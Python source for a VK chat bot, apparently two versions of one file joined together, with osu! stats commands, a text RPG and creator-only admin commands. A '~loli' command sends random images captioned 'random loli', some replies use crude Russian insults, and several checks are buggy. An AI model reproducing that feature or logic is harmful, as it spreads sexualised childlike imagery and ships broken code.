msg += f"{i[0]+95}%: {i[1]}pp | " if i[0] != len(map["PP"])-1 else f"{i[0]+95}%: {i[1]}pp"
vk.messages.send(random_id=0, user_id=uid, message=msg,
attachment=f"photo{onUpload["owner_id"]}_{onUpload["id"]}")
else:
vk.messages.send(random_id=0, user_id=uid, message=map)
else:
vk.messages.send(random_id=0, user_id=uid, message="Please, recheck URL")
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["pp"])
if event.text.split()[0] in ["o!r", "o!recent"]:
if len(event.text.split()) == 1:
d = osc.recentScore()
if d[1]:
onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
vk.messages.send(random_id=0, user_id=uid, message=d[0],
attachment=f"photo{onUpload["owner_id"]}_{onUpload["id"]}")
else:
vk.messages.send(random_id=0, user_id=uid, message=d[0])
if len(event.text.split()) == 2:
d = osc.recentScore(event.text.split()[1])
if d[1]:
onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
vk.messages.send(random_id=0, user_id=uid, message=d[0],
attachment=f"photo{onUpload["owner_id"]}_{onUpload["id"]}")
else:
vk.messages.send(random_id=0, user_id=uid, message=d[0])
if len(event.text.split()) == 3:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["recent"])
if event.text.split()[0] in ["o!change", "o!c"]:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=osucommands.change(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["change"])
if event.text.split()[0] in ["o!reg", "o!register"]:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=osucommands.register(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["register"])
if event.text.startswith("o!changeavatar"):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=osc.changeAvatar())
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["changeavatar"])
if event.text.startswith("o!me"):
if len(event.text.split()) == 1:
user = osc.me()
if type(user) == dict:
onUpload = upload.photo_messages(user["avatarPath"])[0]
if user["username"].lower().endswith("s"):
user["username"] += "'"
else:
user["username"] += "'s"
msg = f"""{user["username"]} profile
PP: {user["pp"]}
Accuracy: {user["acc"]}%
Level: {user["level"]}
Global Rank / Country Rank: #{user["rank"]} / #{user["countryrank"]} ({user["country"]})
{user["playcount"]} plays total
Hits: {user["x300"]} x300 | {user["x100"]} x100 | {user["x50"]} x50
SS/SSH ranks: {user["SS"]} / {user["SSH"]}
S/SH ranks: {user["S"]} / {user["SH"]}
A ranks: {user["A"]}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg,
attachment=f"photo{onUpload["owner_id"]}_{onUpload["id"]}")
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["me"])
if event.text.startswith("!test"):
if len(event.text.split()) >= 2:
print(event.text.split())
else:
vk.messages.send(random_id=0, user_id=uid, message='n')
if event.text.startswith('~ping'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message='понг блядь')
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['pingS'])
if event.text.startswith('~shutdown'):
if event.user_id == cid:
vk.messages.send(random_id=0, user_id=uid, message='Shutting down...')
raise SystemExit
if event.text.startswith('~restart'):
if event.user_id == cid:
if ingame:
for i in ingame:
ingame.remove(i)
com.mapLeave(i)
vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]["first_name"]} был удалён из сессии")
vk.messages.send(random_id=0, user_id=uid, message='Restarting bot...')
print("Started restart")
with open('.rsttemp', 'w') as f:
f.write(str(event.user_id))
os.execv(sys.executable, ['python'] + sys.argv)
if event.text.startswith('~reload'):
if event.user_id == cid:
if len(event.text.split()) == 2:
if event.text.split()[1] in ["sh", "com", "ver", "utils"]:
if event.text.split()[1] == "sh":
reload(sh)
if event.text.split()[1] == "com":
reload(com)
if event.text.split()[1] == "ver":
reload(ver)
if event.text.split()[1] == "utils":
reload(utils)
vk.messages.send(random_id=0, user_id=uid, message=f"Module \"{event.text.split()[1]}\" reloaded")
else:
vk.messages.send(random_id=0, user_id=uid, message="~reload (module)")
if event.text.startswith('~ruleofinternet') or event.text.startswith('~rofi'):
if len(event.text.split()) == 2:
if event.text.split()[1] == 'random':
randrule = str(random.randint(1, 49))
vk.messages.send(random_id=0, user_id=uid, message=com.rofi(randrule))
else:
vk.messages.send(random_id=0, user_id=uid, message=com.rofi(event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['ruleofinternet'])
if event.text.startswith('!register'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.register(uid, userName, userLastName))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp["register"])
if event.text.startswith('!showinv'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.showInventory(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp["showinv"])
if event.text.startswith('!unregister'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.delete(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['unregister'])
if event.text.startswith('~secretkitty'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message="""
⊂_ヽ
\\ Λ_Λ
\( ˇωˇ)
⌒ヽ
/ へ\
/ / \\
レ ノ ヽ_つ
/ /
/ /|
( (ヽ
| |、\
| 丿 \ ⌒)
| | ) /
`ノ ) Lノ
(_/
""")
if event.text.startswith('!version'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=f"Account version: v.{ut.checkVersion(uid)}\nLatest version: v.{ver.latestVersion}")
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['version'])
if event.text.startswith('!upgrade'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=ver.upgradeToLatest(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['upgrade'])
if event.text.startswith('!enter'):
if len(event.text.split()) == 1:
if uid not in ingame:
ingame.append(uid)
com.playerToMap(uid)
vk.messages.send(random_id=0, user_id=uid, message="Account is now in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="U're already in session")
else:
vk.messages.send(random_id=0, userid=uid, message=comhelp['enter'])
if event.text.startswith("!actlist"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.actions(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp["actlist"])
else:
vk.messages.send(random_id=27, user_id=uid, message="You must be in session")
if event.text.startswith("!move"):
if uid in ingame:
if len(event.text.split()) == 2:
direction = event.text.split()[1].lower()
if direction in ['right', 'left', 'up', 'down']:
vk.messages.send(random_id=0, user_id=uid, message=sh.move(uid, direction))
else:
vk.messages.send(random_id=0, user_id=uid, message="Wrong direction, enter one of the 'right', 'left', 'up', 'down'")
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("!open"):
if ut.checkVersion(uid) >= ver.latestVersion:
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=sh.openChest(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['open'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!description"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.itemDesc(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['description'])
if event.text.startswith("!action"):
if uid in ingame:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=sh.itemAction(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['action'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("!itemlist"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.showShopList(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['itemlist'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("!buy"):
if ut.checkVersion(uid) >= ver.latestVersion:
if uid in ingame:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.buyItem(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['buy'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!sell"):
if ut.checkVersion(uid) >= ver.latestVersion:
if uid in ingame:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.sellItem(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['sell'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!tradeinv"):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.showTradeInventory(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tradeinv'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!tileplayers"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.playersOnTile(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tileplayers'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/pm"):
if uid in ingame:
if len(event.text.split()) > 2:
if int(event.text.split()[1]) not in ingame:
vk.messages.send(random_id=0, user_id=uid, message="User isn't in game")
else:
if ut.inFriends(uid, event.text.split()[1]):
vk.messages.send(random_id=0, user_id=event.text.split()[1], message=f"{com.searchByID(uid)}(PM): {" ".join(event.text.split()[2:])}")
vk.messages.send(random_id=0, user_id=uid, message=f"{com.searchByID(uid)}(PM): {event.text.split()[2:]}")
else:
vk.messages.send(random_id=0, user_id=uid, message="This user isn't in your friendlist")
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['pm'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/sendmoney"):
if len(event.text.split()) == 3:
vk.messages.send(random_id=0, user_id=uid, message=com.sendMoney(uid, event.text.split()[1], event.text.split()[2]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendmoney'])
if event.text.startswith("/sendgift"):
if ut.isExist(uid):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) >= 3:
if ut.checkVersion(event.text.split()[1]) >= 51:
vk.messages.send(random_id=0, user_id=uid, message=com.sendGift(uid, event.text.split()[1], event.text.split()[2], event.text.split()[3:]))
else:
vk.messages.send(random_id=0, user_id=uid, message="This account have version lower than 51 or not registered")
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendgift'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
else:
vk.messages.send(random_id=0, user_id=uid, message="Register first")
if event.text.startswith("/acceptgift"):
if ut.isExist(uid):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.acceptGift(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['acceptgift'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
else:
vk.messages.send(random_id=0, user_id=uid, message="Register first")
if event.text.startswith("/rejectgift"):
if isExist(uid):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.rejectGift(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['rejectgift'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
else:
vk.messages.send(random_id=0, user_id=uid, message="Register first")
if event.text.startswith("/chat"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
else:
sh.chat(uid, event.text.split()[1:], False)
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/me"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
else:
sh.chat(uid, event.text.split()[1:], True)
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/addfriend"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.addFriend(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['addfriend'])
if event.text.startswith("/denyrequest"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.denyFriendRequest(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['denyrequest'])
if event.text.startswith("/friendlist"):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.friendList(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['friendlist'])
if event.text.startswith("/removefriend"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.removeFriend(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['removefriend'])
if event.text.startswith('!leave'):
if len(event.text.split()) == 1:
if uid in ingame:
ingame.remove(uid)
com.mapLeave(uid)
vk.messages.send(random_id=0, user_id=uid, message="Account removed from session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Account isn't in session")
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['leave'])
if event.text.startswith("!save"):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.save(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['save'])
if event.text.startswith('!whereami'):
if len(event.text.split()) == 1:
kurwa = com.getCoords(uid)
vk.messages.send(random_id=0, user_id=uid, message=f"You're on ({kurwa[0]};{kurwa[1]}) (x;y)")
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['whereami'])
if event.text.startswith("~!!dropsession"):
if event.user_id == cid:
if ingame:
for i in ingame:
ingame.remove(i)
com.mapLeave(i)
vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]["first_name"]} был удалён из сессии")
else:
vk.messages.send(random_id=0, user_id=uid, message='Никого в сессии нет, еблан')
if event.text.split()[0] in ["~", "~help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "~":
help: {comhelp['help']}
osuhelp: {comhelp['osuhelp']}
gamehelp: {comhelp['gamehelp']}
socialhelp: {comhelp['socialhelp']}
ping: {comhelp['ping']}
uploadmany: {comhelp['uploadmany']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
elif len(event.text.split()) == 2:
if event.text.split()[1] in comhelp:
vk.messages.send(random_id=0, user_id=uid, message=comhelp[event.text.split()[1]])
if int(event.text.split()[1]) in [2]:
if int(event.text.split()[1]) == 2:
msg = f"""~help page 2:
description: {comhelp['description']}
ruleofinternet: {comhelp['ruleofinternet']}
loli: {comhelp['loli']}
uploadone: {comhelp['upload']}
"""
else:
vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~help")
if event.text.split()[0] in ["!", "~gamehelp", "!help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "!"
register: {gamehelp['register']}
unregister: {gamehelp['unregister']}
version: {gamehelp['version']}
upgrade: {gamehelp['upgrade']}
enter: {gamehelp['enter']}
leave: {gamehelp['leave']}
whereami: {gamehelp['whereami']}
move: {gamehelp['move']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if len(event.text.split()) == 2:
if event.text.split()[1] in gamehelp:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp[event.text.split()[1]])
if int(event.text.split()[1]) in [2, 3]:
if int(event.text.split()[1]) == 2:
msg = f"""~gamehelp page 2:
save: {gamehelp['save']}
open: {gamehelp['open']}
showinv: {gamehelp['showinv']}
tradeinv: {gamehelp['tradeinv']}
action: {gamehelp['action']}
itemlist: {gamehelp['itemlist']}
buy: {gamehelp['buy']}
sell: {gamehelp['sell']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if int(event.text.split()[1]) == 3:
msg = f"""~gamehelp page 3:
tileplayers: {gamehelp['tileplayers']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
else:
vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~gamehelp")
if event.text.split()[0] in ["/", "~socialhelp", "/help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "/"
chat: {sochelp['chat']}
me: {sochelp['me']}
addfriend: {sochelp['addfriend']}
removefriend: {sochelp['removefriend']}
denyrequest: {sochelp['denyrequest']}
firendlist: {sochelp['friendlist']}
sendmoney: {sochelp['sendmoney']}
sendgift: {sochelp['sendgift']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if len(event.text.split()) == 2:
if event.text.split()[1] in sochelp:
vk.messages.send(random_id=0, user_id=uid, message=sochelp[event.text.split()[1]])
else:
vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~socialhelp")
if event.text.split()[0] in ["o!", "~osuhelp", "o!help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "o!"
pp: {osuhelp["pp"]}
register: {osuhelp["register"]}
change: {osuhelp["change"]}
recent: {osuhelp["recent"]}
me: {osuhelp["me"]}
changeavatar: {osuhelp["changeavatar"]}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if len(event.text.split()) == 2:
if event.text.split()[1] == "pp":
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["ppextended"])
else:
if event.text.split()[1] in osuhelp and event.text.split()[1] != "pp":
vk.messages.send(random_id=0, user_id=uid, message=osuhelp[event.text.split()[1]])
else:
vk.messages.send(random_id=0, user_id=uid, message="Commands is not found. Try ~osuhelp")
except UnboundLocalError as e:
print(f"Catched a UnboundLocalError exception, restart: {e}")
continue
except TypeError as e:
print(f"Catched a TypeError exception, restart: {e}")
continue
except NameError as e:
print(f"Catched a NameError exception, restart: {e}")
continue
except KeyError as e:
print(f"Catched a KeyError exception, restart: {e}")
continue
except ZeroDivisionError:
pass
if __name__ == '__main__':
main()
| from vk_api.longpoll import VkLongPoll, VkEventType
from time import gmtime, strftime
from importlib import reload
import vk_api
import sys
import os
import osu.calc as calc
import osucommands
import sessionhandler as sh
import utils as ut
import random
import urllib.request
import versions as ver
import commands as com
ingame = []
comhelp = {
'help': 'show the help message for command/to see commands list // ~help | ~ [command or page number (2)]',
'osuhelp': 'show the help message for osu-like commands // ~osuhelp | o! | o!help [command]',
'pingS': 'u can\'t write "~ping"?',
'ping': 'just ping the bot // ~ping',
'ruleofinternet': 'check the interesting rule (ex. 34) // ~rofi | ~ruleofinternet (number/"random")',
'gamehelp': 'help for ingame commands // ~gamehelp | ! | !help [command or page number(2, 3)]',
'socialhelp': 'help for social commands // ~socialhelp | "/" | "/help" [command]',
'loli': 'catch the random loli // ~loli',
'upload': 'upload the picture to bot\'s drive // ~uploadone (photo attachment)',
'uploadmany': 'upload the pictureS to bot\'s drive // ~uploadone (photo attachmentS)'
}
gamehelp = {
'enter': 'enter to the world! // !enter',
'version': 'find out account version // !version',
'upgrade': 'upgrate to latest account version // !upgrade',
'register': 'register the account // !register',
'unregister': 'delete the account // !unregister',
'whereami': 'we know where are you (x;y) // !whereami',
'description': 'see item desc in ur inv. // !description',
'tradeinv': 'see your trade inv. // !tradeinv',
'showinv': 'see your inv. // !showinv',
'move': 'move is some direction // !move (right, left, up, down)',
'leave': 'leave the session // !leave',
'tileplayers': 'see all players on your tile // !tileplayers',
'save': 'save your position // !save',
'open': 'open the chest if u\'re on it // !open',
'action': 'action w/ item in inventory // !action (item number in inv.)',
'itemlist': 'check the item list in the shop // !itemlist',
'buy': 'buy the item // !buy (item number in merchant\'s inv.)',
'sell': 'sell the item // !sell (item number in inventory)',
'actlist': 'show the actions list that u can do // !actlist'
}
sochelp = {
'chat': 'chat with players on your tile (ONLY in game) // /chat (message)',
'addfriend': 'send/accept friend request // /addfriend (ID)',
'denyrequest': 'deny/cancel friend request // /denyrequest (ID)',
'friendlist': 'your friend list // /friendlist',
'me': 'do something in chat (like hug someone) (ONLY in game) // /me (action(message))',
'pm': 'send private message to friend (ONLY in game) // /pm (friendID) (message)',
'removefriend': 'remove user from your friend list // /removefriend (friendID)',
'sendmoney': 'send money to user // /sendmoney (userID) (count)',
'sendgift': 'send gift to your friend // /sendgift (friendID) (item number in inventory) (message)'
}
osuhelp = {
'pp': 'check pp for map // o!pp (link) [args (check ~osuhelp pp)]',
'ppextended': '''check pp for map // o!pp (link) [args (--oppai recommended)]
Arguments:
-m, --mods (HRHDDT-like)
-a, --acc (float number like, ex. 99.9 (if more then 100.0, equals to 100.0))
-o, --offline | --oppai (use the local calculation (also can calculate unranked maps))''',
'register': 'register as user to get recent scores for your profile // o!register (Username or ID in osu!)',
'recent': 'view your/user\'s recent score // o!recent [Username or ID in osu!]',
'change': 'change your osu! profile // o!change (Username or ID in osu!)',
'me': 'see your osu!profile // o!me',
'changeavatar': 'redownload your avatar if you changed it // o!changeavatar'
}
with open('token.txt', 'r') as f:
token = f.read()
vk_session = vk_api.VkApi(token=token)
longpoll = VkLongPoll(vk_session)
print("Longpool authorized.")
vk = vk_session.get_api()
print("API things authorized.")
with open("usertoken.txt", "r") as uf:
usertoken = uf.read()
uservkSession = vk_api.VkApi(token=usertoken)
uvk = uservkSession.get_api()
print("User API things authorized.")
def main():
upload = vk_api.VkUpload(vk_session)
with open('creator.txt', 'r') as c:
cid = int(c.read())
if os.path.isfile('.rsttemp'):
with open('.rsttemp') as f:
uid = f.read()
os.remove('.rsttemp')
vk.messages.send(random_id=0, user_id=uid, message="Bot restarted")
print("---------------Rdy to use---------------")
while True:
try:
for event in longpoll.listen():
if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:
uid = event.user_id
osc = osucommands.commands(uid)
userData = vk.users.get(user_ids=uid)[0]
userName = userData['first_name']
userLastName = userData['last_name']
if event.text.startswith("~loli"):
if len(event.text.split()) == 1:
directory = "\\photos"
photo = random.choice(os.listdir(directory))
onUpload = upload.photo_messages(photos=directory + photo)[0]
vk.messages.send(random_id=0, user_id=uid, message="here's your random loli", attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['loli'])
if event.text.startswith("~uploadone"):
if len(event.text.split()) == 1:
if len(event.attachments) == 2:
print(event.attachments)
if event.attachments["attach1_type"] == "photo":
photo = uvk.photos.getById(photos=event.attachments["attach1"])[0]["sizes"][-1]
urllib.request.urlretrieve(photo["url"], os.path.join("photos", f"{photo['url'].split('/')[-1]}"))
vk.messages.send(random_id=0, user_id=uid, message="Successfully uploaded on bot\'s drive")
else:
vk.messages.send(random_id=0, user_id=uid, message=f"The attachment type must be 'photo', not {event.attachments['attach1_type']}")
else:
vk.messages.send(random_id=0, user_id=uid, message="You can upload only one image")
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp["upload"])
if event.text.startswith("~uploadmany"):
if len(event.attachments) >= 2:
urls = []
for att in range(1, len(event.attachments) // 2 + 1):
if event.attachments[f"attach{att}_type"] == "photo":
urls.append(uvk.photos.getById(photos=event.attachments[f"attach{att}"])[0]["sizes"][-1]["url"])
else:
vk.messages.send(random_id=0, user_id=uid, message=f"Attachment {att} will not be uploaded (attachmentType:{event.attachments[f'attach{att}_type']})")
if urls:
dots = f"00.00%: 0/{len(urls)}"
message = vk.messages.send(random_id=0, user_id=uid, message=f"{dots}")
print(message)
for url in enumerate(urls):
urllib.request.urlretrieve(url[1], os.path.join("photos", f"{url[1].split('/')[-1]}"))
dots = ("=" * url[0]) + ">"
vk.messages.edit(peer_id=uid, message_id=message, message=f"{ut.toFixed((url[0]+1)/len(urls) * 100, 2)}% | {url[0]+1}/{len(urls)}")
vk.messages.edit(peer_id=uid, message_id=message, message="Attachments uploaded to bot's drive")
else:
vk.messages.send(random_id=0, user_id=uid, message="You don't attached anything")
"""
2 commands w/ secret syntax
"""
if event.text.startswith("o!pp"):
if len(event.text.split()) >= 2:
if ut.checkURL(event.text.split()[1]):
stats = {"acc": 0.0, "mods": "", "combo": 0}
if any(i in event.text.split() for i in ["-a", "—acc"]):
a = "-a" if "-a" in event.text.split() else "—acc"
ind = event.text.split().index(a)
try:
acc = float(event.text.split()[ind+1])
stats["acc"] = acc
if acc > 100:
vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be more than 100% (entered {acc}), equate to 100%')
stats["acc"] = 0.0
if acc < 0:
vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be less than 0% (entered {acc}), equate to {acc} module')
stats["acc"] = -acc
except:
vk.messages.send(random_id=0, user_id=uid, message='"acc" argument entered wrong')
if "-combo" in event.text.split():
ind = event.text.split().index("-combo")
try:
stats["combo"] = int(event.text.split()[ind+1])
except:
vk.messages.send(random_id=0, user_id=uid, message='"-combo" argument entered wrong')
if any(i in event.text.split() for i in ["-m", "—mods"]):
m = "-m" if "-m" in event.text.split() else "—mods"
ind = event.text.split().index(m)
if len(event.text.split()[ind+1]) <= 1:
vk.messasges.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
elif event.text.split()[ind+1].startswith('-'):
vk.messasges.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
else:
s = [event.text.split()[ind+1][i:i+2] for i in range(0, len(event.text.split()[ind+1]), 2)]
wm = []
if "HR" and "EZ" in s:
vk.messages.send(random_id=0, user_id=uid, message="HR and EZ can't be in one selection")
del s[random.choice(s.index("HR"), s.index("EZ"))]
if "DT" and "HF" in s:
vk.messages.send(random_id=0, user_id=uid, message="DT and HF can't be in one selection")
del s[random.choice(s.index("DT"), s.index("HF"))]
if "NF" and ("SD" or "PF") in s:
vk.messages.send(random_id=0, user_id=uid, message="NF and SD/PF can't be in one selection")
if "RX" in s or "AP" in s:
vk.messages.send(random_id=0, user_id=uid, message="RX and AP mods aren't provided when calcucating pp")
for i in s:
if i.upper() == "RX":
del s[s.index(i)]
elif i.upper() == "AP":
del s[s.index(i)]
elif i.upper() == "SD":
del s[s.index(i)]
stats["misses"] = 0
elif i.upper() == "PF":
del s[s.index(i)]
stats["acc"] = 0.0
elif i.upper() in ["HR", "HD", "DT", "NC", "FL", "EZ", "NF", "HT"]:
stats["mods"] += i.upper()
else:
wm.append(i)
if wm:
vk.messages.send(f"These mods aren't exist: {', '.join(wm)}")
msg = event.text
link = msg.split()[1]
if not link.startswith("https://"):
link = f"https://{link}"
map = None
if any(i in event.text.split() for i in ["-o", "—oppai", "—offline"]):
map = osc.calcOppai(link, acc=stats['acc'], mods=stats['mods'])
if not map:
if osc.checkStatus(link):
map = osc.calcTillerino(link, acc=stats['acc'], mods=stats['mods'])
if not map:
message = vk.messages.send(random_id=0, user_id=uid, message="An error has occured when trying to do things w/ Tillerino API")
map = calc.calcMap(link,
acc=stats['acc'],
combo=stats['combo'],
amods=stats['mods'],
uid=uid,
messageid=message,
t=token)
else:
map = "Beatmap status should be Ranked (or use -oppai)"
if type(map) == dict:
onUpload = None
if not map:
onUpload = upload.photo_messages(f"osu\\tmp\\dotosu\\Beatmap-{map['beatmapid']}\\thumbnail.jpg")[0]
else:
onUpload = upload.photo_messages(f"tmpthumbs\\{map['beatmapsetid']}.jpg")[0]
length = strftime("%M:%S", gmtime(int(osucommands.getLength(map["beatmapid"]))))
msg = f"""Title: {map['title']}
Length: {length}
AR: {map['AR']} | CS: {map['CS']} | OD: {map['OD']}
Stars: {map['stars']}
Combo: {map['combo']}/{map['maxcombo']}
PP: """
if len(map["PP"]) == 1:
msg += f"{map['PP'][0]}\nAccuracy: {map['acc']}%"
else:
for i in enumerate(map['PP']):
msg += f"{i[0]+95}%: {i[1]}pp | " if i[0] != len(map["PP"])-1 else f"{i[0]+95}%: {i[1]}pp"
vk.messages.send(random_id=0, user_id=uid, message=msg,
attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
else:
vk.messages.send(random_id=0, user_id=uid, message=map)
else:
vk.messages.send(random_id=0, user_id=uid, message="Please, recheck URL")
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["pp"])
if event.text.split()[0] in ["o!r", "o!recent"]:
if len(event.text.split()) == 1:
d = osc.recentScore()
if d[1]:
onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
vk.messages.send(random_id=0, user_id=uid, message=d[0],
attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
else:
vk.messages.send(random_id=0, user_id=uid, message=d[0])
if len(event.text.split()) == 2:
d = osc.recentScore(event.text.split()[1])
if d[1]:
onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
vk.messages.send(random_id=0, user_id=uid, message=d[0],
attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
else:
vk.messages.send(random_id=0, user_id=uid, message=d[0])
if len(event.text.split()) == 3:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["recent"])
